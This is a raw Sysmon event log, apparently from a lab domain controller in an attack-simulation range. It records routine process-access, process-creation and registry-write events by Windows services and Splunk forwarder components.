14:08:49.482{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:49.482{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:49.482{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9671-6005-8005-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:49.482{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9671-6005-8005-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:49.483{59A5CD1D-9671-6005-8005-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x800000000000000019218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:08:51.654{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda3-0x72dcf76a) 13241300x800000000000000019228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:00.216{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000019227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:00.216{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x002031b3) 13241300x800000000000000019226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:00.216{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed9b-0x161d2825) 13241300x800000000000000019225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:00.216{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6eda3-0x77e19025) 13241300x800000000000000019224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:00.216{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6edab-0xd9a5f825) 13241300x800000000000000019223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:00.216{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000019222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:00.216{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x002031b3) 13241300x800000000000000019221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:00.216{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed9b-0x161d2825) 13241300x800000000000000019220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:00.216{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6eda3-0x77e19025) 13241300x800000000000000019219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:00.216{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6edab-0xd9a5f825) 10341000x800000000000000019230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:19.075{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:19.075{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:23.981{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000019234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:32.297{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x800000000000000019233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:32.297{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Config SourceDWORD (0x00000001) 13241300x800000000000000019232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:32.297{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B.XML 10341000x800000000000000019242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:44.574{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-96A8-6005-8105-00000000A301}6980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:44.574{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:44.574{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:44.574{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:44.574{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:44.574{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-96A8-6005-8105-00000000A301}6980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:44.574{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-96A8-6005-8105-00000000A301}6980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:44.574{59A5CD1D-96A8-6005-8105-00000000A301}6980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:45.574{59A5CD1D-96A9-6005-8205-00000000A301}45526732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:45.417{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-96A9-6005-8205-00000000A301}4552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:45.417{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:45.417{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:45.417{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:45.417{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:45.417{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-96A9-6005-8205-00000000A301}4552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:45.417{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-96A9-6005-8205-00000000A301}4552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:45.418{59A5CD1D-96A9-6005-8205-00000000A301}4552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk 